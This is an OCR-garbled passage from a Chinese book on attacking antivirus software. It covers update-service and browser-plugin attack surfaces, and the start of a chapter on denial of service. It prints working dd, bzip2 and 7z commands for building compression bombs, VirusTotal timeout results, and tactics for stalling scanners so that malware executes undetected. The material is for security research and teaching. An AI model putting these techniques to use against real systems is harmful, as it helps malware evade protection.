式 被 利用 攻击 。 正 确 解 析 HTTP 协 议 的 可 能 性 有 多 大 ?尽管 HTTP 协 议 十 分 复杂 , 但 还 是 有 可 能 
证 在 解析 过 程 中 不 出 漏洞 。 但 是 如 果 需 要 同时 处 理 ARP、 IP、TCP、UDP、SNMP、SMTP、POP3、 
OracleTNS 、CIFS 和 其 他 网 络 协议 呢 ? 这 时 候 网 络 流量 解析 模块 就 和 文件 解析 模块 一 样 了 : 十 分 
有 可 能 存在 漏洞 。 





















































10.3.5 ”更 新 服务 


和 文件 感染 修复 模块 一 样 , 更 新 服务 也 鲜 有 人 研究 。 尽 管 如 此 ,更 新 服务 仍然 是 远程 攻击 的 
一 个 人 口 点 。 举 个 例子 ， 如果 和 大 多 数 反 病 毒 软件 一 样 ， 一 款 反 病 毒 软件 的 更 新 服务 通过 未 经 过 
SSL 或 TLS 加 蜜 的 HITP 协 议 从 服务 器 下 载 更 新 文件 。 这 种 情况 下 , 如果 更 新 服务 下 载 了 一 个 新 的 
可 执行 文件 〈 比 如 PE 文件 或 动态 链接 库 )， 攻 击 者 就 可 以 截断 正常 更 新 过 程 ， 并 将 正常 更 新 文件 
替换 成 恶意 的 、 修 改过 的 甚至 是 伪造 的 更 新 文件 .这样 攻击 者 就 可 以 通过 反 病 毒 软件 的 更 新 过 程 ， 
在 用 户 的 个 人 电脑 上 安装 恶意 软件 ,而 恶意 软件 将 会 被 反 病毒 软件 执行 。 这 种 情况 下 ,恶意 代码 
会 被 以 SYSTEM 权 限 运 行 , 并 受 反 病毒 软件 的 自我 保护 模块 防护 , 因此 变 得 十 分 难以 侦 测 和 移 除 。 

这 种 通过 反 病 毒 软件 更 新 服务 进行 攻击 的 漏洞 , 听 起 来 或 许 不 太 可 能 出 现 , 却 在 不 少 反 病毒 
软件 中 都 存在 。 俄罗斯 的 Dr.Web 反 病毒 软件 就 有 过 这 样 的 一 个 漏洞 , 我 们 将 在 后 面 的 章节 中 进行 


讨论 o 
10.3.6 ”浏览 器 插件 


许多 反 病 毒 产品 都 会 安装 浏览 器 插件 来 检查 网 站 、URL 和 下 载 文件 的 信誉 来 判断 这 些 对 象 是 
否 会 执行 恶意 操作 。 反 病毒 软件 的 浏览 器 插件 因为 执行 上 下 文 是 浏览 锅 , 所 以 自然 而 然 暴 露 在 了 
攻击 者 的 攻击 范围 中 ,无 论 是 局 域 网 和 广域网 攻击 者 都 可 以 欺骗 用 户 访问 攻击 者 控制 的 恶意 页 
面 。 如 果 浏 览 器 插件 存在 一 个 或 多 个 漏洞 ,无 论 用 户 是 否 安装 了 防火 墙 ， 攻击 者 都 可 以 远程 利用 
漏洞 来 攻击 用 户 。 
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ActiveX 流 行 的 时 候 ， 反 病毒 浏览 器 插件 的 漏洞 十 分 常见 。 当 时 ， 许 多 反 病 毒 产 品 都 会 开发 
一 些 反 病毒 引擎 的 迷你 版 ， 这 些 迷 你 版 引 敬 可 以 作为 一 个 ActiveX 控 件 般 入 被 Internet Explorers 
现 的 页 面 。 通 过 将 一 个 ActiveX 控 件 插入 网 页 ， 用 户 可 以 不 在 电脑 上 安装 反 病 毒 软 件 ， 而 只 需 访 
问 对 应 的 在 线 杀 毒 网 页 就 可 以 体验 到 相关 反 病 毒 软件 功能 。 但 是 类 似 的 反 病 毒 模 块 也 容易 受到 大 
量 攻击 : 最 常见 的 漏洞 是 缓冲 区 溢出 和 设计 缺陷 。 

比如 , F-Secure Anti-Virus 的 2010 和 2011 版 本 会 提供 一 个 可 被 Internet Explorer 加 载 并 标记 为 安 
全 的 ActiveX 模 块 ; 但 是 该 ActiveX 插 件 存在 一 个 堆 溢出 漏洞 , 允许 攻击 者 执行 远程 代码 进行 攻击 。 
该 漏洞 被 Garage4Hackers 团 队 发 现 ， 并 在 www.exploittdb.comyexploits/17715/ 上 了 予以 公开 。 

再 举 一 个 卡巴 斯 基 反 病毒 软件 ActiveX 插 件 AxKLSysInfo.dll 的 例子 ， 它 可 在 没有 风险 提示 的 
情况 下 ,被 Internet Explorer 加 载 并 被 标识 为 安全 的 插件 。 该 ActiveX 控 件 允 许 攻击 者 从 FTP 目 录 中 
检索 内 容 ， 因 此 可 能 会 允许 攻击 者 绕 过 防火 墙 防护 从 FTP 服 务 器 上 读 取信 息 。 这 是 一 个 十 分 典型 
的 浏览 器 插件 设计 缺陷 问题 。 

还 有 比 这 更 加 糟糕 的 设计 缺陷 例子 ， 比 如 Comodo Antivirus ActiveX 控 制 漏洞 。2008 年 ， 
Comodo Antivirus ActiveXx 提 供 了 一 个 名 为 ExecuteSstr 的 函数 ， 用 来 有 效 地 执行 系统 命令 。 攻 击 
者 要 做 的 就 是 创建 一 个 网 页 ， 般 入 调 用 该 ActiveX 的 代码 ， 其 骗 用 户 使 用 Internet Explorer 打 开 。 
通过 这 样 利 用 这 个 漏洞 , 攻击 者 就 可 以 在 浏览 器 环境 中 执行 任意 系统 命令 。 这 只 是 在 一 款 反 病毒 
软件 中 发 现 的 严重 漏洞 之 一 ， 在 其 他 反 病 毒 产 品 发 现 类 似 漏洞 也 不 足 为 奇 。 


10.3.7 ”安全 增强 软件 


除了 安装 之 前 提 到 的 模块 外 , 大 多 数 反 病 毒 产 品 还 会 安装 其 他 应 用 。 这 些 应 用 常 被 称 作 “ 安 
全 增强 ”应 用 ,引发 了 人 们 极 大 的 兴趣 ， 因 为 它们 在 开发 过 程 中 存在 玖 忽 ， 形 成 了 一 个 攻击 面 。 
安全 增强 应 用 的 例子 是 反 病毒 软件 公司 创建 或 修改 的 某 些 浏览 器 功能 , 用 于 进行 银行 交易 操作 或 
其 他 重要 支付 安全 场景 的 防护 。 反 病毒 产品 甚至 会 安装 天 气 类 应 用 ,虽然 不 知道 这 是 出 于 什么 目 
的 ; 这 类 腾 肿 和 不 安全 的 软件 只 会 增加 攻击 面 。 甚 至 有 反 病 毒 软 件 会 安装 广告 应 用 ， 比 如 免费 版 
本 的 Avira 和 任意 版 本 的 金山 毒霸 (所 有 版 本 都 是 免费 的 )。 

当 我 们 谈 到 亚洲 市 场 C 主要 是 中 国 市 场 ) 的 时 候 , 会 发 现 有 很 多 本 地 化 的 浏览 器 ， 其 装机 量 
十 分 庞大 。 比 如 , 一 些 反 病毒 软件 会 安装 本 地 化 和 安全 增强 浏览 器 ， 比 如 瑞星 或 金山 毒霸 。 瑞 星 
会 安装 一 个 仿 Internet Explorer 的 中 文 用 户 界面 的 浏览 需 。 但 是 ， 其 实 该 浏览 器 使 用 的 是 Internet 
Explorer 7 , 不 带 沙 盒 。 对 于 攻击 者 来 说 , 另 一 个 好 消息 是 , 该 浏览 器 的 不 少 模块 都 没有 启用 ASLR。 
自然 而 然 地 , 攻击 者 现在 不 仅 可 以 攻击 反 病 毒 软 件 的 内 核 、 扫 描 需 等 常见 模块 ,还 可 以 攻击 被 反 
病毒 套装 推荐 设置 成 默认 浏览 器 的 瑞星 安全 浏览 器 。 金山 毒霸 的 例子 更 奇特 有 趣 。 该 反 病 毒 公司 
提供 了 一 个 中 国 本 土 化 浏览 器 “猎豹 ”。 该 浏览 器 是 Google Chrome 的 一 个 定制 版 本 。 最 近 在 研究 
该 浏览 器 的 时 候 ， 我 发 现 了 以 下 问题 : 
O 该 浏览 需 无 缘 无 故地 禁用 了 安全 沙 盒 ; 
口 该 浏览 器 的 很 多 动态 链接 库 都 没有 启用 ASLR ( 比如 ，kshmpg.dll 和 iblocker.d1l ); 































































































































































































Q TI Vd EE ERRAN e BEA BUR TIT SES INI V E LT o 

自然 而 然 地 ， 如今 如 果 要 攻击 一 球 反 病毒 产品 , 最 有 意思 的 攻击 点 就 是 反 病 毒 软件 安装 的 浏 
览 铝 。 同 时 ,因为 浏览 需 是 二 线 产 品 ,所 以 反 病 毒 软件 公司 在 开发 此 类 浏览 器 的 过 程 中 , 并 不 会 
有 很 强 的 安全 开发 意识 。 这 些 安全 增强 版 浏览 器 不 会 像 浏 览 器 内 核 那样 开发 得 严谨 有 序 ( 不同 于 
普通 人 的 第 一 印象 ， 这 里 我 们 假定 内 核 代码 的 编写 更 为 严谨 )。 






































10.4 总 结 


本 章 探 讨 了 如 何 确 定 反 病 毒 软 件 的 攻击 面 , 相关 技术 可 以 用 于 确定 其 他 软件 的 攻击 面 。 攻 击 

面 可 以 分 为 两 类 : 本 地 攻击 面 和 远程 攻击 面 。 

本 地 攻击 面 通过 本 地 用 户 触发 执行 。 以 下 是 一 些 典 型 的 本 地 攻击 面 。 

O 错误 的 文件 或 目录 权限 配置 造成 的 本 地 提 权 漏洞 ”比如 类 Unix 系 统 上 的 SUID 和 SGID 二 

进 制 文 件 。 

OQ 本 地 拒绝 服务 攻击 ”通过 大 量 的 请 求 ， 最 终 降低 了 反 病 毒 软件 的 运行 速度 ， 或 直接 导致 

反 病 毒 软件 关闭 退出 。 

O 缺少 或 错误 使 用 操作 系统 或 编译 器 提供 的 保护 技术 ”比如 在 Windows 平 台 上 ， 反 病毒 软 
件 会 向 其 他 进程 注入 其 保护 模块 。 如 果 对 应 保护 模块 不 支持 ASLR 的 话 ， 这 会 让 所 有 进程 
都 易于 遭 到 恶意 攻击 。 男 一 个 例子 是 反 病毒 软件 在 编译 的 时 候 没 有 启用 DEP。 这 两 个 例子 
都 会 降低 攻击 者 在 利用 反 病毒 软件 漏洞 过 程 中 的 门槛 。 

O 反 病 毒 软件 内 核 设备 驱动 漏洞 ”如 果 反 病毒 软件 使 用 了 通过 IOCTL 与 用 户 态 模块 交互 的 
驱动 ， 比 如 文件 系统 过 滤器 或 自我 保护 驱动 ， 不 正确 的 缓冲 区 处 理 方式 和 逻辑 错误 会 最 
终 导 致 攻击 者 可 以 在 用 户 态 利用 驱动 设备 的 漏洞 ， 进 行 系统 级 别 的 代码 执行 攻击 。 

OD 开发 编程 理念 错误 导致 的 逻辑 漏洞 ”类似 漏洞 会 导致 系统 被 攻破 。 一 个 例子 是 ， 反 病毒 
软件 预 留 的 后 门 会 被 用 来 禁用 反 病 毒 软 件 。 只 要 攻击 者 发 现 了 相关 后 门 ， 就 可 以 在 攻击 
过 程 中 加 以 利用 了 。 我 们 要 时 刻 记 住 ， 通 过 反 汇 编 ， 一 些 隐 藏 的 逻辑 将 无 处 通 形 。 最 终 ， 
所 有 潜藏 的 后 门 都 会 被 发 现 。 

口 Windows 对 象 的 错误 权限 配置 “Windows 为 对 象 设置 ACL 提 供 了 详尽 的 配置 系统 EJF 
体 、 事 件 和 线程 对 象 等 )。 反 病毒 软件 开发 者 需要 确保 反 病 毒 软 件 的 系统 对 象 被 设置 了 正 
确 的 ACL， 否 则 类 似 恶 意 软件 这 样 的 低 权 限 程 序 都 可 以 与 相关 文件 交互 。 

远程 攻击 面 是 由 攻击 者 远程 实施 的 , 不 需要 接触 到 本 机 。 反 病毒 软件 中 暴露 在 网 络 中 或 接受 

网 络 传人 的 不 受信 任 的 值 都 会 带 来 安全 风险 。 下 面 列 举 了 一 些 可 行 的 远程 攻击 途径 。 

O 针对 不 同文 件 格式 的 解析 器 正如 前 面 几 章 提 到 的 那样 ， 通 过 电子 邮件 接收 到 的 带 有 ;img 
或 iframe 等 HTML 标 签 或 其 他 不 受信 任 内 容 的 恶意 文件 和 文档 ， 会 触发 反 病 毒 引 擎 的 安 
全 缺陷 ， 最 终 导致 系统 被 攻破 。 

口 通用 侦 测 程序 和 感染 文件 修复 代码 ” 当 进 行 感染 文件 修复 的 时 候 ， 反 病毒 软件 需要 读 取 
并 解析 被 感染 文件 中 的 相关 字 节 来 完成 修复 。 这 时 候 恶 意 修 改过 的 感染 文件 样本 可 能 会 
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触发 反 病 毒 软 件 中 感染 文件 修复 程序 的 安全 缺陷 。 

OQ 网 络 服务 、 管 理 面板 和 控制 台 管理 控制 台 和 其 他 一 些 Web 接 口 是 接 触 用 户 网 络 的 入 口 。 
比如 , 如 果 反 病毒 软件 的 Web 管 理 控制 台 会 执行 用 户 端 传递 的 特权 指令 , 以 及 如 果 因 为 存 
在 一 个 漏洞 ， 用 户 可 以 控制 传递 给 Web 接 口 的 指令 ， 那么 一 切 就 完了 。 

O 浏览 器 插件 ” 反 病 毒 软件 通常 会 给 浏览 器 安装 相关 插件 来 添加 网 页 浏览 保护 。 一 个 存在 
缺陷 的 浏览 器 插件 的 例子 是 ， 可 以 通过 网 页 内 的 JavaScript 进 行 交互 。 攻 击 者 上 只 要 欺骗 用 
户 点 击 恶意 页 面 ， 恶 意 页 面 中 的 代码 就 会 借助 插件 的 漏洞 执行 任意 危险 代码 ， 最 终 攻 破 
系统 。 

O 防火 墙 、 入 侵 检测 系统 和 其 他 网 络 协议 分 析 模块 ”这 种 类 型 的 攻击 十 分 类 似 于 针对 文件 
格式 解析 器 进行 的 攻击 。 如 果 特 定 的 网 络 协议 解析 器 中 存在 缺陷 ， 攻 击 者 就 可 以 向 防火 

载 发 送 精心 构造 的 恶意 网 络 流量 包 来 远程 触发 相关 模块 的 漏洞 。 

O 更 新 服务 ”正如 第 5 章 中 讨论 的 那样 ， 这 种 类 型 的 攻击 会 带 来 十 分 严重 的 危害 。 
在 结束 本 章 之 前 ， 值 得 一 提 的 是 : 研究 远程 攻击 面 并 不 比 研究 本 地 攻击 面 更 高 级 。 事 实 上 ， 

只 有 结合 利用 远程 和 本 地 的 相关 漏洞 , 才 会 最 终 成 功 实施 攻击 : 首先 利用 一 个 远程 攻击 代码 侵入 

目标 机 器 网 络 ， 接 着 使 用 一 个 本 地 漏洞 提 权 ， 最 终 完全 控制 目标 机 器 。 

下 一 章 将 会 探讨 各 式 各 样 的 拒绝 服务 攻击 , 以 及 如 何 利用 拒绝 服务 攻击 使 反 病毒 软件 瘫痪 并 

在 开展 攻击 的 过 程 中 将 反 病 毒 软 件 禁 用 一 段 时 间 。 


































































































拒绝 服务 攻击 














针对 反 病 毒 软件 的 拒绝 服务 攻击 可 能 是 本 地 进行 的 , 也 可 能 是 远程 进行 的 ; 最 常见 的 攻击 之 
一 意 在 禁用 反 病 毒 软件 的 防护 。 本 章 将 会 前 释 常 见 的 拒绝 服务 漏洞 ,并 探讨 此 类 漏洞 的 挖掘 方式 。 

拒绝 服务 攻击 是 针对 某 个 软件 或 装 有 某 些 软件 的 计算 机 开展 的 攻击 , 目的 是 让 目标 软件 或 计 
算 机 无 法 正常 工作 。 针 对 反 病 毒 软件 可 以 开展 多 种 形式 的 拒绝 服务 攻击 。 举 例 来 说 , 针对 反 病 毒 
软件 开展 拒绝 服务 攻击 , 通常 是 为 了 禁用 反 病 毒 软件 , 或 者 将 其 从 正在 受到 恶意 病毒 感染 的 或 已 
经 被 感染 的 机 器 上 移 除 。 这 类 攻击 对 恶意 软件 来 说 是 十 分 重要 的 一 环 ; 通过 拒绝 服务 攻击 将 反 病 
毒 软件 禁用 或 移 除 ， 避 免 其 日 后 更 新 升级 ， 进 而 确保 恶意 软件 能 够 长 久 驻 留 在 受害 者 的 电脑 中 。 

旨 在 禁用 反 病 毒 软件 的 拒绝 服务 攻击 又 被 称 作 “AV 终 结 者 "。 在 恶意 软件 中 ， 它 们 被 当 作 单 
独 的 工具 或 模块 来 执行 , 熟知 如 何 利 用 通过 相关 技术 挖掘 到 的 反 病 毒 软件 的 缺陷 和 漏洞 来 终结 其 
防护 服务 。 其 实 大 多 “AV 终 结 者 ”进行 的 所 谓 拒 绝 服务 攻击 ， 严 格 来 说 并 不 能 归 类 为 “拒绝 服 
务 攻击 ”， 因 为 它们 需要 攻击 者 首先 获取 被 感染 的 计算 机 的 管理 员 权 限 ， 印 载 反 病毒 软件 或 禁用 
反 病 毒 软件 对 应 的 Windows 服 务 。 在 接 下 来 的 几 节 中 ,我 们 将 会 跳 过 前 面 提 到 的 这 种 “ 伪 拒 绝 服 
务 攻击 ”, 重点 关注 “真正 的 拒绝 服务 攻击 ”: 后 者 可 以 由 低 权限 的 本 地 用 户 发 起 或 远程 借助 本 章 
提 到 的 一 些 攻击 向 量 来 实施 。 


11.1 本 地 拒绝 服务 攻击 


针对 反 病 毒 软件 的 本 地 拒绝 服务 , 是 指 在 安装 了 反 病 毒 软件 的 同一 台 计 算 机 上 实施 的 拒绝 服 
务 攻击 。 有 很 多 种 不 同 的 本 地 拒绝 服务 攻击 ， 下 面 列举 一 些 最 常见 的 攻击 方式 : 
O 压缩 炸弹 (也 可 以 用 于 进行 远程 拒绝 服务 攻击 ); 
a 文件 格式 解析 器 中 的 漏洞 (也 可 以 用 于 进行 远程 拒绝 服务 攻击 ); 
a 针对 内 核 驱 动 进行 攻击 ; 
a 针对 网 络 服务 进行 攻击 〈 也 可 以 用 于 进行 远程 拒绝 服务 攻击 ， 尽 管 有 一 些 网 络 服务 可 能 
只 监听 了 类 似 localhost 或 127.0.0.1 这 样 的 本 地 卫 地 址 )。 
接 下 来 将 详细 阐释 上 面 提 到 的 几 种 本 地 拒绝 服务 攻击 及 其 相关 后 果 。 
























































162 第 11 章 拒绝 服务 攻击 





11.1.1 压缩 炸弹 


针对 反 病 毒 软 件 最 简单 直 白 、 广 为 人 知 且 较为 通用 的 本 地 拒绝 服务 攻击 非 压缩 炸弹 莫 属 。 压 
缩 炸弹 是 一 个 包含 许多 压缩 文件 的 压缩 文件 , 这 些 被 包含 的 压缩 文件 中 又 有 一 层 压缩 文件 , 以 此 
KHE, 压缩 炸弹 也 可 以 是 在 压缩 前 十 分 大 的 GB 级 别 文件 , 但 是 压缩 后 文件 大 小 仅 有 10 MB, 3 MB 
甚至 1 MB。 这 类 漏洞 的 用 武之 地 有 限 ， 却 不 可 小 舰 。 这 类 漏洞 生生 不 息 旦 影响 着 目前 几乎 任何 
一 款 桌面 版 、 服 务 器 版 、 在 线 版 反 病 毒 软 件 。 

尽管 部 分 反 病 毒 软 件 针 对 ZIP 和 RAR 格式 的 炸弹 进行 了 处 理 修复 ， 但 可 能 忽视 了 一 些 其 他 常 
见 的 压缩 文件 格式 ， 比 如 XAR、7z、GZ 和 BZ2。2014 年 , 我 花 了 一 天 时 间 对 一 些 反 病毒 产品 进行 
了 快速 的 研究 分 析 ， 来 确认 这 些 反 病 毒 软件 是 否 受 此 漏洞 影响 。 图 11-1 显 示 了 本 次 测试 的 结果 。 
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人 GB 内 存 的 测试 机 器 上 ，Sophos 反 病毒 软件 扫描 压缩 炸弹 测试 
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UIT Miis. 这 些 休 积 为 32 GB 的 临时 文件 在 以 7z 格 式 压缩 后 体积 大 约 
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AERAR ESET 反 病毒 软件 扫描 小 型 测试 机 器 上 的 压缩 炸弹 样本 用 时 大 约 为 1 分 
钟 。 














图 11-1 SyScan 2014 中 名 为 “攻破 反 病毒 软件 ”的 议题 PPT 截 图 ， 其 中 展示 了 各 款 反 
病毒 软件 受 压缩 炸弹 漏洞 的 影响 情况 


反 病 毒 软件 、 网 络 检查 工具 或 其 他 受 此 漏洞 影响 的 工具 , 受 压缩 炸弹 影响 会 不 同 程度 地 被 干 
扰 数 秒 或 数 分 钟 ， 如 果 相 关 工 具 在 扫描 过 程 中 陷 人 了 死 循环 ,还 有 可 能 会 永久 显示 正在 扫描 。 此 
类 攻击 为 攻击 者 创造 了 一 个 可 以 为 所 欲 为 的 时 间 窗 口 。 比 如 , 攻击 者 想 要 让 恶意 软件 从 互联 网 上 
下 载 一 个 很 可 能 会 被 反 病毒 侦 测 到 的 恶意 软件 到 本 地 磁盘 上 。 攻击 者 可 以 使 恶意 软件 首先 下 载 
个 压缩 炸弹 , 让 反 病 毒 引擎 扫描 压缩 炸弹 ， 使 引擎 在 扫描 压缩 炸弹 过 程 中 无 法 工作 。 同时 ,真正 
的 可 执行 恶意 文件 已 经 被 悄然 下 载 、 执 行 ， 并 在 最 后 被 删除 。 这 些 亚 意 操 作 都 在 反 病 毒 软件 扫描 
压缩 诈 强 的 过 程 中 完成 。 显 然 ， 此 类 攻击 是 一 种 临时 禁用 反 病毒 软件 的 好 方法 ， 为 攻击 者 创造 了 
执行 不 受 限 制 的 恶意 操作 的 时 间 。 

生成 简单 的 压缩 炸弹 

在 本 节 ， 我 们 将 会 学 习 如 何 借助 标准 的 Unix 和 Linux 工 具 创 建 一 个 简单 的 压缩 炸弹 。 首 先 ， 
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我 们 需要 使 用 命令 aa 创建 一 个 0 字 节 填充 的 文件 : 

dd if=/dev/zero bs=1024M count-1 > file 

创建 好 样本 文件 后 , 将 其 压缩 。 我 们 可 以 使 用 任何 一 款 压 缩 工具 , 将 样本 文件 压缩 成 任意 格 
式 的 压缩 文件 ， 比 如 GZip 或 BZip2。 下 列 命令 创建 了 一 个 2 GB 的 样本 文件 ， 接 着 直接 将 其 压缩 成 
了 BZip2 格 式 ， 并 生成 了 一 个 1522 字 节 的 压缩 文件 : 

dd if=/dev/zero bs-2048M count-1 | bzip2 -9 > file.bz2 

我 们 可 以 使 用 wc 工具 ,快速 查 看 生成 文件 的 大 小 : 


$ LANG=C dd if=/dev/zero bs=2048M count-1 | bzip2 -9 | wc -c 
0+1 records in 

0-1 records out 

2147479552 bytes (2.1 GB) copied, 15.619 s, 137 MB/s 

1522 


尽管 生成 的 压缩 炸弹 十 分 简易 ， 但 是 通过 VirusTotal 报 告 我 们 看 到 ， 该 炸弹 已 经 影响 到 了 不 
少 反 病毒 产品 https//www.virustotal.com/file/£32010df7522881cfa81aa72d58d7e98d75c3dbb4cfa4fa- 
2545ef67575dbc7c/analysis/1426422322/., 

观察 多 引擎 扫描 报告 ， 会 发 现 有 8 款 反 病毒 软件 正确 标识 出 了 我 们 生成 的 样本 文件 是 压缩 炸 



























































弹 。 但 是 ， 如 图 11-2 所 示 ，Comodo 和 McAfee-GW-Edition 一 列 显示 的 是 “时 钟 ” 图 标 。 
Comodo © 20150315 
Cyren © 20150315 
DrWeb © 20150315 
ESET-NOD32 © 20150315 
F-Prot © 20150315 
Fortinet © 20150315 
Ikarus © 20150315 
Jiangmin © 20150314 
K7AntiVirus © 20150315 
K7GW © 20150315 
Kaspersky © 20150315 
Kingsoft © 20150315 
Malwarebytes © 20150315 
McAfee © 20150315 
McAfee-GW-Edition c 20150315 











图 11-2 ”VirusTotal 结 果 显 示 有 两 款 反 病毒 软件 扫描 超时 


时 钟 图 标 表示 扫描 分 析 超 时 , 这 样 我 们 就 能 够 推测 出 :可 以 利用 刚才 那个 简易 压缩 炸弹 样本 ， 
针对 这 两 款 反 病毒 软件 发 起 攻击 。 但 是 ， 之 前 生成 的 简易 压缩 炸弹 的 文件 格式 是 BZip2。 这 次 ， 
让 我 们 来 试 试 男 一 种 压缩 文件 格式 一 一 7z。 通过 以 下 指令 , 我 们 可 以 将 一 个 2 GB 的 样本 文件 压缩 
成 300 KB 的 7z 文 件 : 
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$ LANG=C dd if=/dev/zero bs=2048M count-1 > 2gb dummy 
$ 7z a -t7z -mx9 test.7z 2gb dummy 


0+1 records in 
0+1 records out 
2147479552 bytes (2.1 GB) copied, 15.619 s, 137 MB/s 


$ 7z a -t7z -mx9 test.7z 2gb dummy 

7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18 
p7zip Version 9.20 (localezes ES.UTF-8,Utfl6-on,HugeFiles-on,8 CPUs) 
Scanning 

Creating archive kk.7z 

Compressing  2gb dummy 


Everything is Ok 
$ du -hc test.7z 
300K kk.7z 
300K total 


让 我 们 将 新 生成 的 7z 文 件 上 传 到 VirusTotal 上 ， 查 看 是 否 有 反 病 毒 软件 受 此 压缩 炸弹 样本 影 
响 : https://www.virustotal.com/file/8649687fbd3f801ealeSe07fd4fd2919006bbc47440c75d8d9655e30- 
18039498/analysis/1426423246/。 

这 次 , 只 有 一 款 反 病毒 软件 提示 样本 可 能 是 一 个 压缩 炸弹 , 这 款 反 病毒 软件 是 VBA32。 我 们 
可 以 注意 到 这 次 卡巴 斯 基 扫 描 也 超时 了 。 太 棒 了 1! 我 们 可 以 使 用 7z 来 临时 禁用 卡巴 斯 基 。 让 我 们 
再 来 尝试 一 下 另 一 种 文件 格式 一 XZ。 我 们 可 以 使 用 7z 来 将 刚刚 2 GB 的 样本 文件 压缩 成 XZ 文件 
格式 ， 指 令 如 下 : 

$ 7z a -txz -mx9 test.xz 2gb dummy 

这 次 ， 又 有 一 些 反 病毒 产品 的 VirusTotal 多 引 敬 扫描 结果 显示 超时 ， 即 Symantec 和 Zillya: 
https://www.virustotal.com/file/ff506albcdbafb8e887c6b485242b2db6327e9d267c4e38faf526052- 
60e4868c/analysis/1426433218/。 

另外 值得 注意 的 是 , 这 一 次 没有 一 款 反 病毒 软件 提示 我 们 的 样本 文件 是 一 个 压缩 炸弹 。 那 如 
果 我 们 使 用 一 个 8 GB 的 样本 压缩 创建 一 个 文件 格式 是 XAR 的 混 消 压 缩 文件 会 怎样 呢 ? 我 尝试 提 
交 VirusTotal 扫 描 多 次 ,但 如 图 11-3 所 示 ,每 次 都 在 最 后 一 步 扫 撒 失 败 了 :https:Wwww.virustotal.comy 
en/file/Acf14b0e0866ab0b6c4d0be3f412d471482eec3282716c0b48d6baff30794886/analysis/1426434540/ , 


5 total 

















































































































Analysis failed! 


Something went wrong with your analysis. Please, try again. 


Take me back to the main page 

















图 11-3 ”VirusTotal 尝 试 分 析 一 个 采用 XAR 格 式 压缩 、 大 小 为 32 GB 的 虚拟 文件 时 ， 抛 
出 了 错误 消息 
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我 手动 进行 了 测试 ,结果 发 现 会 让 卡巴 斯 基 扫描 超时 。 同 时 值得 一 提 的 是 ,卡巴 斯 基 在 扫描 
压缩 文件 的 时 候 ， 会 创建 临时 文件 。 想 要 在 目标 机 器 上 创建 一 个 32 GB 大 小 的 临时 文件 吗 ? 虽然 
32 GB 比 我 们 测试 的 8 GB 的 文件 大 很 多 ,但 卡巴 斯 基 的 这 种 扫描 方式 给 了 我 们 很 多 启发 。 


11.1.2 ”文件 格式 解析 器 中 的 缺陷 


第 8 章 中 提 到 ， 反 病毒 软件 的 文件 格式 解析 器 普遍 存在 漏洞 ;本 节 将 会 更 详细 地 对 其 进行 探 
究 。 这 类 缺陷 可 以 用 来 在 本 地 或 远程 使 反 病 毒 扫描 器 拒绝 服务 。 根 据 反 病 毒 软件 的 不 同 ， 即 使 是 
微不足道 的 空 指针 引用 漏洞 或 一 个 除 0 漏 洞 都 会 变 得 十 分 有 用 。 因 为 攻击 者 可 以 利用 漏洞 结束 反 
病毒 扫描 服务 , 直至 反 病 毒 软件 被 重启 。 反 病毒 服务 一 般 会 被 监控 模块 自动 重启 或 随 计算 机 重启 
的 时 候 重 启 。 

反 病 毒 软件 的 文件 格式 解析 漏洞 ,也 可 以 用 来 使 样本 绕 过 反 病 毒 扫描 顺 。 比 较 和 常见 的 利用 场 
景 是 恶意 软件 下 载 一 个 可 以 触发 反 病 毒 扫 描 带 解析 异常 的 畸形 文件 , 反 病 毒 扫 描 对 应 文件 后 就 会 
卡 死 ( 比如， 陷入 死 循环 )。 这 样 一 来 ， 畸 形 的 文件 会 首先 破坏 反 病毒 软件 的 扫描 功能 ， 然 后 真 
正 的 恶意 程序 可 以 绕 过 反 病毒 软件 的 侦 测 并 执行 。 这 是 所 有 利用 低 危 汤 洞 禁用 反 病毒 软件 案例 里 
的 一 个 。 从 实战 角度 来 说 , 这 一 技巧 可 以 用 于 让 ClamAV ( 版 本 低 于 0.98.3 ) 在 扫描 PE 文件 资源 目 
录 下 的 图 标 文件 时 ， 陷 入 死 循 环 : PE 文件 资源 目录 下 图 标 类 似 0xFFFFFFFF 的 数字 会 让 ClamAV 
陷入 永久 的 死 循环 中 。 

让 我 们 用 一 种 更 简单 的 方式 来 前 释 如 何 利用 一 个 文件 格式 解析 漏洞 。 想 象 在 下 列 路 径 结构 中 
有 两 个 这 样 的 文件 : 

base dirMfile-causing-parsing-bug.bin 

base dirNsub-folderNreal-malware.exe 


按照 上 述 路 径 结构 , 反 病 毒 软件 会 首先 扫描 第 一 个 会 触发 路 径 漏洞 的 文件 ; 依据 解析 融 的 不 
[n] , 反 病毒 软件 可 能 会 骨 溃 或 陷 人 死 循 环 中 。 反 病毒 软件 将 无 法 进入 子 目 录 扫 描 真 正 的 恶意 文件 ， 
这 样 就 可 以 绕 过 扫描 带 的 扫描 了 。 类似 地 , 与 将 触发 反 病 毒 软件 解析 漏洞 的 文件 和 恶意 文件 放 在 
同一 个 目录 的 方式 不 同 , 男 一 种 利用 方式 通过 将 相关 畸形 文件 虞 入 恶意 文件 来 绕 过 反 病毒 软件 的 
扫描 。( 将 畸形 文件 放置 在 PE 文件 的 资源 路 径 下 ， 甚 至 直接 写 人 PE、ELF 或 MachO 文 件 的 相关 区 
块 中 。) 这 样 既 不 会 干扰 恶意 软件 的 正常 执行 ， 又 可 以 有 效 绕 过 反 病 毒 扫描 铝 。 


11.1.3 ”攻击 内 核 驱动 


男 一 种 针对 反 病 毒 软件 的 典型 的 本 地 拒绝 服务 攻击 , 主要 借助 内 核 驱 动 的 漏洞 。 大 部 分 针对 
Windows 的 反 病 毒 软 件 都 会 通过 部 署 内 核 驱动 来 防止 反 病 毒 软件 相关 服务 进程 被 恶意 软件 终止， 
防止 调试 希 附 加 到 相关 反 病 毒 服务 上 , 通过 安装 文件 系统 过 滤 驱 动 来 进行 实时 防护 , 或 是 安装 一 
个 NDIS 迷 你 过 滤器 驱动 来 分 析 网 络 流量 。 如 果 反 病毒 软件 使 用 的 相关 驱动 存在 漏洞 ， 本 地 用 户 
又 可 以 与 相关 驱动 进行 交互 并 触发 漏洞 , 这 样本 地 攻击 者 就 可 以 触发 系统 的 内 核 错误 检查 ( 通常 
表现 为 蓝屏 )， 进 而 关闭 或 重启 机 费 。 在 内 核 驱动 发 现 的 漏洞 ， 大 都 是 由 于 接收 相关 参数 值 时 未 
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对 其 进行 合法 性 校 验 造 成 的 IOCTL 漏洞 。 

